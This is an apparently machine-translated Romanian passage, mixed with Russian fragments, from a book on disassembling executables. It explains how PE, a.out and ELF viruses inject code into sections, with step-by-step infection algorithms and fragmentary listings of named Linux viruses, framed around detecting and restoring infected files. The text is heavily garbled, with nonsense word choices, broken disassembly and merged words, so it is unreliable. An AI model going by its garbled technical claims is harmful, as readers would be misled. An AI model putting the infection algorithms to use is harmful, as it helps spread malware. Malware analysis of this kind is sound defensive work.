încărcătorului introdus de categoria A a fost deja descrisă maidevreme în secțiunea cu același nume, deci nu o vom repeta Categoria C: Extinderea ultimei secțiuni de fișiere Ideeaextinderii ultimei secțiuni de fișiere nu este nouă și intră în profunzime în istorie, întorcându-ne la sistemul deoperare MS-DOS în timpul dominanței dominanței dominanței Dominanța regulii Acesta este cel mai evident și mai populardintre toți algoritmii de implementare în general (adesea numiți chiar „metoda de implementare standard”), cu toateacestea, caracteristicile sale tactice și tehnice lasă mult de dorit Este extrem de conflictual, prea vizibil și cuadevărat aplicabil numai pentru unele re-fișiere care îndeplinesc toate cerințele pentru acestea Dar această metodătransferă fără durere ambalaje și procesare de către protectori La prima vedere, ideea nu îndeplinește niciun obstacole:adăugăm codul X în coada ultimei secțiuni, creștem dimensiunea paginii Căutați valoarea corespunzătoare, fără a uita deegalizarea acesteia și de transfer la X- Controlul codului (Fig ) Nu trebuie să se efectueze mișcări suplimentareale unor secțiuni cu privire la altele, ceea ce înseamnă că nu trebuie să -și ajusteze setul brut Problema conflictelorcu structurile oficiale ale re-fișierului dispare și ea și nu avem de ce să ne temem că codul X va rescrie dateleaparținând tabelului de import sau, de exemplu, resurse Dar trebuie doar să îndepărtați ochelarii roz și să priviți înochii realității, deoarece găsiți multe probleme Dar dacă sfârșitul ultimei secțiuni nu coincide cu sfârșitulfișierului?Poate că există GPAVA Demontarea de re-fișiere pe de biți să fie suprapuneri sau doar gunoi lăsatde component?Dar ce se întâmplă dacă ultima secțiune a fișierului este o secțiune de date ne-socializate sau secțiuniaruncate, care în orice moment pot fi descărcate din fișier?Introducerea în ultima secțiune a fișierului nu este doarincorectă din punct de vedere tehnic, ci și incorectă din punct de vedere politic Cu toate acestea, această metodă aredreptul să existe, așa că o vom lua în considerare mai detaliat Secțiune de date și secțiuni suplimentareFig Implementarea codului X în fișier prin extinderea ultimei implementări a secțiunii dacă dimensiunea fizică aultimei secțiuni atunci când este aliniată de alinierea fișierului nu „atinge” la sfârșitul fizic al fișierului, ceea ceînseamnă că codul X ar trebui Fie refuzați să implementați sau să -și fixați corpul până la sfârșitul secțiunii și pânăla sfârșitul fișierului Diferența nu este fundamentală, cu excepția faptului că suprapunerile vor trebui acum să fieîncărcate în memorie, crescând atât timpul de încărcare, cât și numărul de resurse consumate Este strict inacceptabil săfie introdus între sfârșitul secțiunii și începutul excesiv, deoarece suprapunerile sunt cel mai adesea abordate înraport cu începutul fișierului (deși pot fi adresate și la sfârșitul ultimei secțiuni) O altă subtilitate este asociatăcu relatarea dimensiunii virtuale a secțiunii-dacă este mai fizică (așa cum se întâmplă cel mai des), atunci includedeja o parte a excesului, astfel încât noul algoritm de calcul al mărimii este semnificativ complicat Cu atributelesecțiunilor, lucrurile sunt și mai rele Secțiunile de date neconsolabile nu sunt obligate deloc să se încarce de pe disc(deși Windows X/NT le încarcă în continuare), iar secțiunile oficiale (de exemplu, secțiunea elementelor mutate) suntcu adevărat solicitate de către sistem doar la Etapa de încărcare a re-fișării, sunt active doar în stadiul deîncărcare, iar șederea lor suplimentară în memorie nu este garantată Prin urmare, codul X poate provoca cu ușurință oexcepție chiar înainte de a avea timp să transfere gestionarea programului principal Desigur, codul X poate ajustaatributele ultimei secțiuni la discreția sa, dar acest lucru va agrava performanța sistemului și va fi prea vizibil Dacădimensiunea fizică a ultimei secțiuni este zero, care este caracteristică secțiunilor de date inconsolabile, este maibine să o omiteți, introducând -o în penultima secțiune Partea IV Metodele avansate DizAssmit ale algoritmului deimplementare arată astfel: □ Încărcăm liniile de re-headline și analizăm atributele ultimei secțiuni □ Dacă esteinstalat steagul image scn mem shared, refuzăm să implementăm □ Dacă este instalat steagul Image SCN MEM Discardabil saurefuzăm să implementăm sau îl aruncăm singur □ Dacă este instalat steagul YMAGE SCN CNT UNINITILIZAT DATA, din Implementarea este cel mai bine refuzată □ Dacă align up (ls r sz, fa) + ls r a> sizeOfLile, atunci fișierul conținesuprapunere și este mai bine să refuzați implementarea □ Dacă ls v sz> ls r rz, atunci coada secțiunii conține dateinițializate de zero În acest caz, ar trebui să refuzați să introduceți, fie, înainte de a transfera gestionarea,curățați totul în spatele vostru □ Adăugați codul X la sfârșitul fișierului □ Instalați Ls R SZ pe SizeOfLile -LS R OFF □ ecnhls v sz> = (ls r a + ls r sz + (sizeoffile - (ls r a + align up (ls r sz, fa))), lăsați ls v sznechandat, altfel ls v sz: = □ echhls v sz != , пересчитываем image Size □ При необходимости корректируематрибуты внедряемой секции: сбрасываем атрибут image scn mem discardable и присваиваем атрибут image scn mem read □Пересчитываем image Size Идентификация пораженных объектов Внедрения этого типа идентифицировать проще всего — онивыдают себя присутствием кода в the last section a fișierului, care este de obicei o secțiune de date inconsolabilă sauo secțiune de resurse sau o secțiune de servicii, de exemplu, o secțiune de import/export sau elemente mutate Dacăfișierul sursă conținea excesiv (sau gunoiul lăsat de compoter) , este inevitabil pentru ultimele secțiuni Restaurare Restaurarea Obiectele afectate ale programatorilor începători pentru a extinde ultima secțiune a fișierului este deînțeles (descrierea mai mult sau mai puțin detaliată a acestui lucru cu acest lucruManualul de implementare poate figăsit în aproape orice revistă virală), dar greșelile algoritmice făcute de aceștia Neprofitabil Cel mai adesea existăerori de trei tipuri: definiția incorectă a poziției sfârșitului fișierului, lipsa de aliniere și atributelenecorespunzătoare ale secțiunii În același timp, majoritatea acestor erori sunt ireversibile, iar fișierele afectate nutrebuie restabilite Să începem cu acel to) ls r off + ls r sz nu coincide întotdeauna cu sfârșitul fișierului, iar dacăfișierul conține excesiv, acesta va fi distrus nemilos Dacă ls v sz sizeofheaders, extindem rubrica descrisă în secțiunea „Categoriala încărcarea zborului” și dacă acest lucru nu este posibil, abandonim infecția infecției □ Adăugați codul X lasfârșitul fișierului □ Creșteți numărul de securitate cu unul □ Aliniați LS R SZ pe dimensiunea FA □ Declarație latabelul secțiunilor după un alt element, completarea câmpurilor după cum urmează: • Nume -nu contează • ѵ a - -ls v a +align up ((ls v szp ls v sz: ls r sz), aliniere secației) • R offset-sizeoffile v sz-sizef (x-code) sau x • r sz-sizef(cod x) • charac -imagge scn code | image scn mem execut • secțiunea REST- x este întotdeauna prima) Restaurareaobiectelor afectate Determinarea eronată a deplasării secțiunii implementate duce, de obicei, la inoperabilitateacompletă a fișierului, fără cele mai mici speranțe de restaurare a acesteia (am vorbit deja despre acest lucru însecțiunea anterioară) Erorile altor tipuri sunt mai puțin insidioase Living Classic este o dimensiune fizică neașteptatăa secțiunii de pedeapsă Așa cum am menționat anterior, nu este necesar să se egalizeze dimensiunea fizică a ultimeisecțiuni, dar atunci când introduceți o nouă secțiune în fișier, ultima secțiune devine penultima cu toate consecințelecare urmează Categoria C: Extinderea secțiunilor mijlocii ale fișierului, introducerea în mijlocul fișierului se referăla cele mai mari aerobații și oferă codul X al celui mai mare secret Este de preferat să se implementeze fie laînceputul sau la sfârșitul secțiunii de cod, care în marea majoritate a cazurilor este prima secțiune a fișierului Acestalgoritm moștenește toate cele mai bune caracteristici ale creării unui mijloc excesiv la mijloc, întărirea în modrepetat a acestora: codul X introdus aparține aspectului paginii, nu există nicio depășire, astfel încât nu existăconflicte cu o bandă-mi/pachete Introducerea la începutul implementării la începutul secțiunii de cod poate fi realizatăîn două moduri În primul rând, puteți muta secțiunea de cod împreună cu toate secțiunile care o urmăresc spre dreapta,mutându -l fizic în fișier și reglând toate legăturile către adresele absolute din aspectul paginii În al doilea rând,este posibil să se reducă ѵ A și R OFF prin secțiunea de cod cu aceeași valoare, completând locul vacant cu codul X,atunci nici legături fizice, nici virtuale nu vor trebui ajustate, deoarece secțiunea va fi proiectată către precedentadrese Este ușor de arătat că mutarea secțiunii de cod atunci când introduceți codul X la început se efectuează în modsimilar mutării secțiunii de date atunci când introduceți codul în coada secțiunii (consultați „Introducere la sfârșit”}subdiviziuni , și, prin urmare, nu este luat în considerare aici Ne concentrăm pe granița de vest a secțiunilor de codși aspectele tehnice ale deplasării sale în profunzimile antetului GPAV Demontarea re-fișierelor de de biți de fapt, întreaga problemă este că marea majoritate a secțiunilor de codîncepe cu adresa LOOH-adresa minimă admisă, a dictat că nu există nicăieri să se retragă-titlul este pentru noi Putețiface acest lucru în două moduri În primul rând, puteți reduce adresa de bază a de bază Încărcare pe dimensiune, unmultiplu de kbytes și ajustați toate legăturile către adresele RVA Aceasta este obositoare, iar adresa de bază aîncărcării marea majoritate a fișierelor- aceasta este adresa minimă acceptată de Windows X În al doilea rând, putețidezactiva alinierea în fișierul, mutarea frontierei la orice număr de octeți, multiple din două (dar apoi fișierul nu vafi lansat sub Windows L) Algoritmul tipic de implementare prin reducerea adresei de descărcare de bază arată astfel: □Citiți re-cap □ Dacă baza de imagine oh, trageți cs v sz la ns v a - cs v a •Pentru fiecare secțiune: dacă v sz> r sz, creșteți lungimea secțiunii de pe v sz - r sz octet, mutând toate celelalteîntr -o imagine fizică și un aspect de pagină • Pentru fiecare secțiune: dacă v sz = z> = dimensiunea imaginii, la z este o adresă eficientă care necesită corectare (desigur, tehnica propusănu este prea fiabilă, Dar încă funcționează) Algoritmul de implementare tipic arată astfel: □ Citiți re-tabelul □ Dacănu există elemente mobile, este mai bine să refuzați implementarea, deoarece fișierul poate pierde performanța □ Găsițisecțiunea de cod a fișierului □ Dacă cs v sz == sau cs v sz> = cs r sz, crește r sz al secțiunii de cod a fișierului □ECNHCS V SZ mov?ESIț eaxPush Xor Xor Inc Inc Push Push Push Push Inc Inc Push Push Push Push Mov EAX Eax, Edx, AH AH EXC ECX EBX ECX ECX Exex ExEx Ex EAX EAX EXEX EDX INT AH ESP "Adăugați ssp"? H cod xref: sub * tpt |;Linux -;Linux -;Linux -Fig Structura tipică a sys open sys lsek old mmap fig Schema tipică de infecție a fișierului executabil prinabsorbție Partea IV Metode avansate DizAssmit, după ce a primit controlul, virusul elimină conținutul fișieruluioriginal din corpul său, îl scrie într -un fișier temporar, îi atribuie un atribut executabil și pornește un fișier„vindecat” pentru execuție, apoi îl delestează din disc din nou Întrucât astfel de manipulări trec rareori neobservate,unii viruși îndrăznesc să „manifeste” încărcătura victimei de pe disc Cu toate acestea, nu este ușor să scrieți oprocedură pentru încărcarea corectă a fișierului ELF și este și mai dificil să o depanați, astfel încât aspectul unorastfel de viruși pare puțin probabil În final, formatul ELF este semnificativ mai complicat decât un A OT simplu Ocaracteristică caracteristică a unor astfel de viruși este un segment minuscul de cod, urmat de un segment imens de date(excesiv), care este un fișier executabil independent (Fig ) Încercați o căutare contextuală pentru a găsi titlulELF/Coff/A Out - În fișierul infectat vor fi două dintre ele!Doar nu încercați să copleșiți/segment de date-codulsemnificativ nu va funcționa, deoarece, în primul rând, acest lucru necesită locația exactă a punctului de intrare și,în al doilea rând, pentru a aranja coada fișierului dizassembled la adresele sale legale În plus, conținutul original alfișierului poate fi criptat în mod deliberat de virus, iar apoi Dizassembler va returna gunoiul gol, ceea ce nu va fiușor de descoperit Totuși, acest lucru nu complică analiza Este puțin probabil ca codul virusului să fie foarte mare,iar restaurarea algoritmului de criptare (dacă are loc cu adevărat criptarea) nu va dura mult timp Orez Un exemplude fișier absorbit de virusul unix a out este minuscul, doar trei sute de octeți, dimensiunea secțiunii de cod indică omare probabilitate de infecție mai rău dacă virusul transferă o parte din fișierul original în segmentul de date șiparte la segmentul de cod Un astfel de fișier arată ca un program obișnuit cu singura excepție că cea mai mare parte asegmentului de cod este un „cod mort” care nu primește niciodată management Segmentul de date la prima vedere parenormal, cu toate acestea, la o examinare atentă, se constată că toate legăturile încrucișate (de exemplu, legăturile culinii de text) sunt deplasate în raport cu adresele lor „native” Deoarece este ușor de ghicit, cantitatea de deplasareeste lungimea virusului Demontarea dezvăluie funcția de exe și furculița care sunt caracteristice virușilor, utilizatepentru lansarea unui fișier „vindecat”, funcția CHMOD pentru a atribui fișierul de atribute executabil, etc Infecțiadosarului constă în extinderea ultimei securitate /segment a victimei și derivatul corpului tău la sfârșitul ei Notă înmod tradițional, atunci când descrie viruși de acest tip, a fost utilizată termenul secțiune În plus, această tradițieva fi observată în text, deși în raport cu fișierele ELF va fi oarecum incorectă, deoarece bootloatorul de sistem alfișierelor ELF executabile funcționează exclusiv cu segmentele, iar secțiunile, așa cum s -a menționat deja menționatdeja Mai devreme, ignoră Strict vorbind, această afirmație nu este în întregime adevărată Ultima secțiune a fișierului estede obicei o secțiune BSS, conceput pentru a stoca date nesocializate Este posibil să se prezinte aici, dar nu are rost,deoarece bootloader -ul nu este atât de prost încât să petreacă timp prețios de procesor pentru încărcarea datelornonproperty de pe un disc lent Mai corect GPAV Demontarea fișierelor ELF pentru Linux șiBSD ar spune „ultimasecțiune semnificativă”, dar să nu găsim vina, aceasta nu este o disertație, nu?Înainte de secțiunea BSS, secțiunea Data care conține date inițializate este de obicei localizată Deci ea devine principalul obiect al unui atac viral!Prinsetarea dizassemblerului pe fișierul studiat, consultați ce secțiune se află punctul de intrare Și, dacă aceastăsecțiune se dovedește a fi o secțiune de date (ca în cazul prezentat în Fig ), fișierul studiat cu un grad ridicatde probabilitate este infectat cu virusul În exemplul prezentat în această ilustrație, fișierul a fost infectat cuvirusul poliengine linux lime poly Virusul și -a introdus corpul la sfârșitul secțiunii de date și a instalat punctul deintrare pe acesta Prezența codului executabil în secțiunea de date face ca prezența virusului să fie extrem de vizibilă: BF;Linux - sys write h offset DH;Denumirea alternativă este principală TA: C DNTO: CB DATA: Date: Data: Data DC Data: C Gen ll: O EC data: EE data: EF data: Г data: F data:O FE data: data:Ѳ Ѳ data: E data: Г data: data: data: F data: data: data : B S : Mov Mov Call POP MOV MOV ADD ECXEAX, EBX, Code Xref: Date: a Alj (Offset Host "SG* H) S;Linux - sys creat ebx, offset hwt ’p'vv ecx, a hedx, dh ebp, eentry ebx eax, ecx, offseolfjiead;„(Jelfo Edx, h - Filsz, Edx P Nensz Edx I și-aintrodus corpul la sfârșitul secțiunii de date și am instalat un punct de intrare pe Când sunt introdus în virusul A OT,în cazul general, ar trebui să facă următoarele acțiuni: □ Numărarea titlului fișierului, asigurați -vă că acesta esteîntr -adevăr un A OT cu o dimensiune egală cu dimensiunea corpului dvs □ Copiați -vă la sfârșitul fișierului □Reglați conținutul câmpului A Entry pentru interceptare (dacă virusul interceptează cu adevărat controlul în acest mod) Implementarea în fișierele ELF are loc într -un mod puțin mai dificil (Fig ) Implementarea în fișierul ELF alvirusului, în cazul general, ar trebui să facă următoarele: □ Virusul deschide fișierul și, citind rubrica sa, esteconvins că acesta este cu adevărat fișierul de format ELF pentru infecție Orice segment cu atributul PL LOAD estepotrivit pentru infecție;De fapt, restul segmentelor sunt, de asemenea, mai mult sau mai puțin potrivite pentruinfecție, dar codul virusului din ele va părea oarecum ciudat Partea IV Metode avansate de dizassembing ale coduluide cap și a datelor din Fig Schema tipică de infecție a fișierului executabil prin extinderea ultimei sale secțiuni□ Segmentul găsit este „deschis” până la sfârșitul fișierului și crește cu o dimensiune egală cu dimensiunea corpuluivirusului, care se realizează prin corectarea sincronă a Câmpurile P FILEZ și P MEMZ □ Virusul se pregătește lasfârșitul fișierului infectat □ Pentru a intercepta controlul, virusul ajustează punctul de intrare la fișier (e entry)sau introduce în adevăratul punct al intrării JMP în corpul său Cu toate acestea, metoda de interceptare amanagementului este subiectul unei conversații mari separate Informații mai detaliate despre această problemă vor fioferite în capitolul , „Tehnici anti-încărcare și o ascunzătoare și căutarea Windows și Linux”, precum și pe un CDfurnizat cu această carte ”) De regulă, o mică remarcă tehnică, de regulă, De regulă, acesta are doar două atribute:atributul lecturii (citit) și atributul înregistrării (scrierea) Atributul de execuție (executare) este absent prinimplicită Aceasta înseamnă că execuția codului viral din el este imposibil? Întrebarea nu are un singur răspuns Totuldepinde de caracteristicile implementării unui anumit procesor și a unui sistem de operare specific Unele dintre eleignoră absența unui atribut de execuție, crezând că dreptul de a executa codul direct rezultă din dreptul de a citi Alții sunt excluși, de urgență completarea implementării programului infectat Pentru a ocoli această situație, virușiipot atribui secțiunea de date executate, trădându -se cu capul Cu toate acestea, astfel de exemplare sunt extrem derare, și deprimatMajoritatea rugăciunii Scriitorii de virus lasă o secțiune de date cu atributele implicite Un alt moment important și nu destul de evident laprima vedere Gândiți -vă cum se va schimba comportamentul fișierului infectat atunci când virusul este introdus înultima secțiune Date, urmate de BSS?Dar nu se va schimba!În ciuda faptului că ultima secțiune va fi proiectată deloc laadrese, codul programului despre acest lucru „nu va recunoaște” și va continua să se refere la variabila nonproperty laadresele lor anterioare, acum ocupate de Codul virusului, care În acest moment a funcționat deja și a returnat dosarulinițial la tot ceea ce frații guvernamentali Cu condiția ca codul software să fie proiectat corect și să nu se bazeze pevaloarea inițială a variabilelor nefertilizate, prezența virusului nu va încălca performanța programului Cu toateacestea, în condițiile dure ale vieții reale, această tehnică elegantă de infecție încetează să funcționeze, deoareceaplicația UNIX medie conține aproximativ zece secțiuni diferite din toate numirile Aruncați o privire, de exemplu, modulîn care utilitatea LS, împrumutată de la distribuția Linux Red Hat (listarea ) Гпава Дизассемблирование ELF-файлов под Linux и BSD Name Start End Align Base Туре Class es ss ds fs gs mit A A plt A CE text CF •fini redata •data • CTORS C DTORS C GOT BSS B Y dword publ DATA Y dword publ DATA Y dword publ DATA Y qword A publ BSS Y byte B publ N byte C publ N FFFF FFFF FFFF FFFFFFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFFFFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFFFFFF FFFF FFFF FFFF FFFF FFFF FFFF Секция data расположена в середине фAila și, pentru a ajunge la el, virusul vatrebui să aibă grijă de modificarea celorlalte șapte secțiuni, ajustând corect câmpurile P OFFSET (deplasarea secțiuniide la începutul fișierului) Unii viruși nu fac acest lucru, ca urmare a fișierelor infectate nu încep Pe de altă parte,secțiunea Data a fișierului în cauză are doar H octeți, deoarece majoritatea datelor programului sunt localizate însecțiunea RoDATA (date disponibile numai pentru citire) Aceasta este o practică tipică a straturilor moderne, iarmajoritatea fișierelor executabile sunt organizate exact așa Virusul nu își poate plasa codul în secțiunea Data,deoarece îl face prea vizibil, nu se poate infiltra RODATA, întrucât în ​​acest caz nu va putea să se descifreze Și nuva avea prea multe sensuri în acest sens De îndată ce virusul trebuie să fie implementat nu la sfârșit, ci în mijloculfișierului, este mai bine pentru el să se infiltreze în secțiunea de date, ci în secțiune Text, care conține cod demașină acolo, virusul nu va fi atât de vizibil în acest sens, vom vorbi despre acest lucru puțin mai departe în acestcapitol, în secțiunea „Infecția prin extinderea secțiunii de cod a fișierului” Compresia unei părți a programelororiginale ale fișierului de zi cresc ca mărime, iar virușii devin mai sofisticate și mai sofisticate Oricât de urât estearuncat codul pe piața Microsoft, acesta este încă semnificativ mai bun decât unele forțe UNIX de artizanat De exemplu,fișierul CAT, care face parte din FreeBSD , durează mai mult de kb Este prea mult pentru o utilitatesimplă?!Vizualizarea fișierului cu un editor de cap dezvăluie un număr mare de secvențe obișnuite (în cea mai mare partea lanțurilor zero), care nu sunt utilizate deloc, fie care pot fi o compresie eficientă Virusul, sedus de prezențaspațiului liber, își poate copia corpul acolo, lasă -l chiar să fie „să se sfărâme” pentru câteva zeci de fragmente Dacănu există spațiu liber, nu contează!Aproape fiecare fișier executabil conține un număr mare de linii de text, iarliniile de text, așa cum sunt cunoscute, sunt ușor de comprimat La prima vedere, un astfel de algoritm de infecție pareextrem de complicat, dar, crede -mă, să -mi dai seama că Packer Huffman (Huffman) este mult mai simplu decât acelșamanism cu secțiuni de frunze pe care virusul trebuie să le facă în mijlocul fișierului În plus, cu această metodă deinfecție, lungimea fișierului rămâne neschimbată, ceea ce ascunde parțial faptul prezența unui virus Nu este oferită a -a opțiune cu eliberarea memoriei pe stivă și copierea corpului viral IUDA În primul rând, aceasta este o sarcină destulde laborioasă pentru care majoritatea scriitorilor de virus nu sunt luați în al doilea rând, după cum am menționat deja,atributul execuției poate fi luat din stivă prin setarea patch -urilor corespunzătoare Partea IV Metodele avansate de DizAssMitting vor lua în considerare modul în care virusul este introdus în segmentul de cod În celmai simplu caz, virusul scanează fișierul pentru căutarea unei secvențe mai mult sau mai puțin lungi de comenzi NOPutilizate pentru a alinia codul programului la mai multe adrese, scrie o bucată din corpul său în ele și adaugă ocomandă a tranziției la următoarea fragment Acest lucru continuă până când virusul este complet în fișier În ultimaetapă a infecției, virusul înregistrează adresele fragmentelor „capturate”, după care transferă gestionarea vehicululuide lansare Dacă acest lucru nu se face, virusul nu va putea să -ți copieze corpul în următorul fișier infectat, deși opereche de virusuri deosebit de sofisticate conține un tracer construit care colectează automat corpul virusului „înzbor”, dar Acestea sunt viruși pur de laborator și nu merg pe jos Diferite programe conțin o cantitate diferită despațiu liber consumat la aliniere În special, programele incluse în setul de bază de livrare BSD sunt compilate înprincipal cu nivelarea a octeți Având în vedere că echipa de tranziție necondiționată în sistemele X ocupă cel puțindoi octeți, stoarcerea virusului în acest volum modest este pur și simplu nerealistă Cu sistemul de operare RedHat ,lucrurile sunt diferite Frecvența alinierii, stabilită de H la H octeți, conține cu ușurință un virus cu dimensiunimedii Să considerăm ca un exemplu un fragment din codul DizAssemble al utilității Ping, infectat cu virusulUnix NuxBe Quilt (listarea ) Listarea Fragment al fișierului infectat cu virusul Unix Nuxbe Quilt, „Smoaring”noi înșine - în conformitate cu secțiunea de cod Text: BD XOR EAX, EAX Text: BDB XOR EBX, EBX Text: BDDD LOC C Text: C C Text Text Text : C XREF: text: BDD J Text: C MOV EBX, ESP TEXT: C MOV EAX, H Text: C INT H; Linuj C - Sys MSync Text: C A Adăugare ESP, H Text: C D JMPLOC D Text: d LOC D : Code xref: text: c dt 'Text: d Dec EAX Text: D JNS scurtLOC D Text: D B JMP Short LOC D B Text: D IS D :; Code xref: text: d ț; [EBP+ H], EAXText: D A MOV EDX, EAX Text: D C} MP Short LOC D C, chiar și un cercetător novice va găsi cuușurință prezența virusului în corpul programului Un lanț caracteristic de instrucțiuni JMP, care se întinde pe întregulsegment de date, nu poate decât să -ți atragă atenția În programele „cinstite”, acest lucru nu se întâmplă aproapeniciodată și protecția vicleană și pachetele de fișiere executabile construite pe motoarele polimorfice, vom lăsa încontinuare deoparte Modificarea celebrului virus Nuxbee, publicat într -un jurnal electronic produs de grupul # A GPAV Dezasarea fișierelor ELF pentru Linux și BSD Rețineți că fragmentele de virus nu trebuie să urmezeliniar Dimpotrivă, virusul va depune toate eforturile pentru a deghiza faptul existenței sale Trebuie să fiți pregătițipentru faptul că instrucțiunile JMP vor sări pe tot parcursul fișierului folosind epilogi „stânga” și prologi pentru ase îmbina cu funcțiile înconjurătoare Dar această înșelăciune este ușor expusă prin referințe încrucișate generateautomat de dizassembler -ul IDA RGO (nu există legături încrucișate cu falsul/epilogi!) Apropo, algoritmul pe care îlconsiderăm nu este în întregime corect Lanțul NOP se poate întâlni oriunde în program (de exemplu, în cadrul funcției),iar apoi fișierul infectat va înceta să funcționeze Pentru a împiedica acest lucru să se întâmple, unii virușiefectuează o serie de verificări suplimentare, în special, sunt convinși că instrucțiunile NOP sunt localizate întredouă funcții, identificându -le prin comenzi de prolog/epilog Implementarea în secțiunea de date este și maiușoară Virusul caută un zero zero lung, despărțit de ASCII-SIMBOL-uri lizibile (mai precis) și, găsind un astfel delanț, consideră că este localizat într-o remiză, formată ca urmare a nivelului de linii text Deoarece liniile de textsunt localizate din ce în ce mai mult în secțiunea Rodata, accesibile numai la citire, virusul ar trebui să fie gata sămențină toate celulele modificate pe stivă și/sau memoria dinamică Este amuzant, dar acest tip de viruși este dificil dedetectat Într-adevăr, prezența simbolurilor ASCII neimprimate între liniile de text este destul de normală Poate căacestea sunt deplasări sau alte structuri de date, în cel mai rău caz, Lăsat de component!De exemplu, în fig arată cum arăta fișierul de pisică (a) și după (b) infecția sa De acord căfaptul că infecția fișierului nu este atât de evident Orez Tipul fișierului CAT înainte de (a) și după (b) infecțiasa Partea IV Metode avansate de dizassembing, cercetătorii cu o anumită experiență cu IDA Pro ar putea să se opunăaici: ei spun, care sunt problemele?El a ajustat cursorul la primul simbol urmând sfârșitul șirului asciiz, a apăsattasta , iar Dizassembler deschide instantaneu codul virusului, țesut pitoresc în linii de text (listarea ) Defapt, acest lucru se întâmplă doar în teorie Printre simbolurile neimprimate ale virusului, există și altelecitibile Analizatorul euristic IDA Pro, acceptându -l greșit pe acesta din urmă pentru liniile de text „reale”, pur șisimplu nu le va permite să -și dizassmit Ei bine, în orice caz, până când acestea sunt în mod clar „depersonalizate”prin apăsarea cheii În plus, virusul poate introduce un simbol special la începutul fiecărui fragment, care faceparte dintr -o anumită echipă de mașini și confundând Dizassembler Drept urmare, IDA Pro este DizAssemble doar un singurfragment din virus (și care este incorect), după care Dizassembing -ul se va opri La rândul său, acest lucru îl vaîmpinge pe cercetător la concluzia că se ocupă de o structură legală de date în care nu există un cod de mașină răuintenționat Vai!Oricât de puternic este IDA Pro Dizassembler, încă nu este atotputernic și totuși trebuie să lucrați latot felul de listare Cu toate acestea, cu o anumită experiență de DizAssMitting, multe echipe de mașini sunt recunoscuteîn groapa hexadecimală la prima vedere Listarea Fragment al fișierului infectat cu virusul Unix Nuxbe Juliet,„Smearing” în sine ș ș ș ș ș ș ș Date RODATA: RODATA: RODATA: RODATA: RODATA: RODATA: •rodata: •rodata: A rodata: A rodata: A rodata: AE rodata: B rodata: B rodata: BA ,rodata: BA rodata: BF rodata: C aFileNameTooLon db 'File name Prea mult timp ', Mov Ebx, MOV ECX, A H JRRP LOC A ATOOMANYLEVELSO DB' Preamulte niveluri de legături simbolice ', C AconectionRefu DB' Conexiune refuzată ', AoperationTimed DB' OperațiuneTemnificată ', LOC - A : Mov Edx DH INT H; Linux - MOV ECX, H MOV EAX, JNP LOC E DB H;Patoomanyreferen db 'Prea multe referințe: Can t splice , Rodata: e Rodata: e • Rodata: e Rodata: e Rodata: e RODATA: EA RODATA: FA RODATA: FF • RODATA: OS E :MOV INT PUS MOV ADD, FDH H;Linux - sys creat [EBX+ b H], BH ECX, A H lângă PTR UNK DB H;P-AcantSendafters DB 'Can', H, 'T Trimite după oprirea prizei', Cu toate acestea, numărul necesar de octeți inter-liniari poate fi scos de departe de toate fișierele executabile, apoi virusul poate recurge la căutare zona mai multsau mai puțin obișnuită cu compresia sa ulterioară În cel mai simplu caz, este căutat un lanț format din același GPAV Demontarea fișierelor ELF pentru Linux și BSD octeți comprimați conform algoritmului RLE În acest caz, virusultrebuie să se asigure că nu va întâlni elemente mutate După ce a primit conducerea și a comis tot ceea ce a dorit săcomită, virusul aruncă un cod comprimat în paharul care este responsabil de aducerea fișierului la starea sainițială Este ușor de observat că doar secțiunile sunt infectate în acest fel, accesibile atât la înregistrare, cât șila citire (adică cele mai seducătoare secțiuni RODATA și Textul nu mai sunt adecvate, cu excepția cazului în carevirusul îndrăznește să -și schimbe atributele, dând la iveală The fapt de infecție cu capul) Virusurile cele maipersistente pot atinge, de asemenea, secțiuni de date nefertilizate Nu, aceasta nu este o greșeală, există într -adevărastfel de viruși Aspectul lor este explicat de Gem de circumstanța că un virus cu drepturi depline în „găurile” rămasede la nivelare este încă dificil de plasat, dar bootloader-ul viral este destul de plasat acolo Secțiunile de dateinconsolabile, strict vorbind, nu numai că nu trebuie să se încarce de pe disc în memorie (deși unele clone UNIX leîncarcă în continuare), dar este posibil să nu fie în fișier, create dinamic de încărcătorul de sistem „RAID” Cu toateacestea, virusul nu le va căuta în memorie!În schimb, le citește manual direct din cel mai infectat fișier (deși, înunele cazuri, acces la Fișierul curent executat este blocat prudent de sistemul de operare) La prima vedere, plasarea virusului corpului său însecțiunea datelor nefertilizate nu schimbă nimic (poate chiar aceasta demască virusul) Dar atunci când va încerca săprindă un astfel de virus, el va aluneca literalmente din mâinile sale Secțiunea de date inconsolabile vizual nu estediferită de toate celelalte secțiuni ale fișierului și poate conține orice: de la o serie lungă de zerouri, lainformațiile despre drepturi de autor În special, creatorii distribuției FreeBSD se fac exact asta (lista ) 'Listarea Așa se face că secțiunile BSS din majoritatea fișierelor din kitul de aprovizionare gratuit BSDOOOOE : FF FF FF FF FF FF FF FF FF FF E : E : (R oooe : B Elease) [FreeBSD F B : E E | E Nu) C OOOOF CO: | (eliberare) F D : B D [FreeBSD] □ F E : | E O D Multe DizAssemblers (și IDA Pro, inclusiv), din motivedestul de logice, nu încarcă conținutul secțiunilor de date nesocializate, remarcând clar această circumstanță printr-un semn dublu de întrebare (listare ) Trebuie să explorăm fișierul direct în Hiew sau în orice alt editor Hex,DISASSEMBLEING A OT/ELF Format „manual”, deoarece editorii populari Hex nu îl acceptă Spune -mi sincer: Ești foarte gatasă faci asta?Deci, indiferent de răspunsul dvs și virușii de acest tip au toate șansele de supraviețuire, chiar dacă nupot provoca epidemii de masă BSS în IDA RGO Dizassembler și majoritatea altor BSS: ??????????-?????????"?????????????????? BSS: ??????????-?????????"?????????????????? BSS: ??????????-?????????"?????????????????? BSS: ??????????-?????????"?????????????????? BSS: A ??????????-??"???????"??? ■" ???? "??????" BSS: B ??????????-?????????"?????????????????? BSS: C ??????????-?????????"?????????????????? BSS: D ??? " BSS: E ????????? ?????????? Introducerea fișieruluiinfectat situat în mijlocul ultimului Corpul virusului, care se îmbină cu codul mașinii sursă, practic devine completindistinguibil de programul „normal” și puteți detecta doar o astfel de analiză a algoritmului său Extinderea iminativăa secțiunii de cod este posibilă numai în fișierele ELF și sicriu („Nedurește” aici este absența necesității re-complicării fișierului infectat) și se realizează din cauza circumstanțelor remarcabile că adresele virtuale de pornireale segmentelor /secțiunile sunt separate de deplasările lor fizice contorizate de la începutul fișierului Algoritmulpentru infecția fișierului ELF în forma 